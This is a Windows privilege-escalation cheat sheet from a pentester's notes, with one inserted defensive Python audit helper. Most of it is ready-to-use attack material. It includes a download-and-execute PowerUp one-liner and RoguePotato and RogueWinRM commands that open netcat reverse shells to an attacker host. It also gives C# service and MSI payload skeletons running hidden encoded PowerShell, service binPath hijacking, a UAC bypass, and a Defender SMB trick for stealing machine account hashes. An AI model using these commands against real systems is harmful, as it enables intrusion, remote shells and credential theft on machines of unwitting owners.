xct's notes
Windows

Enumeration

PrivEscCheck

PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
or:
powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object result.txt"

PowerUp

IEX (New-Object Net.WebClient).DownloadString('<url>/PowerUp.ps1'); Invoke-AllChecks

Unquoted Service Paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
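The wmic one-liner above flags every auto-start service outside C:\Windows whose path is not quoted. As an added example (not part of the original notes), the following Python audit helper applies the same filters to constructed service records and additionally works out which file names Windows would try before reaching the real binary, and therefore which directories' ACLs must be checked for write access by low-privileged users. It goes one step beyond the one-liner by ignoring paths where the only space sits in the arguments. SAMPLE_SERVICES and the function names are assumptions.

```python
import ntpath
from typing import Dict, List

# Constructed sample records in the shape of
# `wmic service get name,pathname,startmode` output (not taken from any real host).
SAMPLE_SERVICES: List[Dict[str, str]] = [
    {"Name": "GoodSvc", "PathName": '"C:\\Program Files\\Good App\\good.exe" -svc', "StartMode": "Auto"},
    {"Name": "BadSvc", "PathName": "C:\\Program Files\\Bad App\\bin\\bad.exe --run", "StartMode": "Auto"},
    {"Name": "ManualSvc", "PathName": "C:\\Program Files\\Manual App\\m.exe", "StartMode": "Manual"},
    {"Name": "Spooler", "PathName": "C:\\Windows\\System32\\spoolsv.exe", "StartMode": "Auto"},
    {"Name": "ArgsOnly", "PathName": "C:\\Tools\\svc.exe -config C:\\Tools\\cfg dir", "StartMode": "Auto"},
]


def createprocess_candidates(path_name: str) -> List[str]:
    """Executables CreateProcess tries, in order, for an unquoted command line:
    it cuts at each space and appends .exe until a real binary name is reached."""
    tokens = path_name.split(" ")
    candidates: List[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)   # the intended binary; the rest are arguments
            break
        candidates.append(prefix + ".exe")
    return candidates


def find_unquoted_service_paths(services: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply the same filters as the wmic one-liner (auto-start, outside C:\\Windows,
    unquoted), then keep only paths with a space *before* the binary name."""
    findings: List[Dict[str, object]] = []
    for svc in services:
        path = svc["PathName"].strip()
        if svc["StartMode"].lower() != "auto" or path.startswith('"'):
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        candidates = createprocess_candidates(path)
        if len(candidates) < 2:
            continue  # space only in the arguments: CreateProcess finds the binary first
        findings.append({
            "Name": svc["Name"],
            "Candidates": candidates,
            # Directories whose ACLs must not grant write/create to low-privileged users.
            "DirsToCheck": [ntpath.dirname(c) for c in candidates],
        })
    return findings
```

Feed it the parsed output of the wmic command (or Get-CimInstance Win32_Service) and check each listed directory's ACL with icacls.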

Common CVEs

CVE-2019-1388: Windows Privilege Escalation Through UAC

Download and start hhupd.exe, get it to launch iexplore.exe from the UAC dialog, then start cmd.exe from the browser's save file dialog.

Privilege Abuse

If privileges are disabled you can enable them with AdjustTokenPrivileges. All these privileges are configured via "secpol.msc -> Local Policies -> User Rights Assignment".

SeBackupPrivilege/SeRestorePrivilege

These privileges allow unrestricted read/write access to every file on the system. They have to be enabled first though, which you can do with these PowerShell cmdlets:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege <source> <target>

SeImpersonatePrivilege

This privilege allows impersonating the user who connects to you. The connection can arrive via HTTP NTLM auth, SMB or named pipes.
This was patched in August 2020 (the spooler won't connect to your named pipe anymore; the underlying technique still works though).
RoguePotato requires that the target server can reach your box on port 135. Run the OxidResolver and use socat to forward your port 135 to the OxidResolver's port. Then run the exploit:
# on attacker box
socat tcp-listen:135,reuseaddr,fork tcp:<oxidip>:9999
# on target
RoguePotato.exe -r <attackerip> -e "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -l 9999
RogueWinRM is usable if WinRM is not already running (unpatched). Usage (don't quote the path):
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "<ip> <port> -e cmd"

Bypassing UAC

There are lots of different bypasses out there; a good collection is UACME, but it gets detected very easily. In Covenant you can do:
BypassUACCommand cmd.exe "/c powershell -enc <cmd>"

Service Abuse

Check permissions on a service:
'service name' | Get-ServiceAcl | Select-Object -ExpandProperty Access
For a payload that behaves like a real service use the following skeleton code (create a new C# console application):
// Goes into a class deriving from System.ServiceProcess.ServiceBase.
// Requires: using System.Diagnostics; using System.Threading;
protected override void OnStart(string[] args)
{
    var si = new ProcessStartInfo
    {
        FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
    };

    var proc = new Process
    {
        StartInfo = si
    };

    // Run the process on a background thread so OnStart returns promptly
    // and the service control manager does not time out the start.
    var t = new Thread(() =>
    {
        proc.Start();
        proc.WaitForExit();
        proc.Dispose();
    });

    t.Start();
}
Finally modify and restart the service (note the space after binPath=, which sc requires):
sc config "service name" binPath= "c:\temp\x.exe"
sc qc "service name"
sc stop "service name"
sc start "service name"

Always Install Elevated

Create an MSI installer in Visual Studio. Skeleton:
using System.Diagnostics;

namespace Service
{
    class Program
    {
        static void Main(string[] args)
        {
            var si = new ProcessStartInfo
            {
                FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
            };

            var proc = new Process
            {
                StartInfo = si
            };

            proc.Start();
            proc.WaitForExit();
            proc.Dispose();
        }
    }
}
Set the output type to WindowsApplication, then add a new project to the solution (of type SetupWizard). Make sure it includes "primary output from <project>". Modify settings as you need. To make sure the payload gets installed, right-click the installer project: View->CustomActions. Then add a custom action to Install that contains the primary output from before.
Finally run:
msiexec /i <filename> /qn

Restoring Service Privileges

GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account

Stealing Machine Account Hash from a Low Privileged Shell

Via Defender

Run Windows Defender against an SMB share you control to capture the machine account hash:
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\<ip>\public\file'
This hash can be cracked via crack.sh, or, if the target is a DC, we can pass the hash to secretsdump (requires NT hash support, which is deprecated).
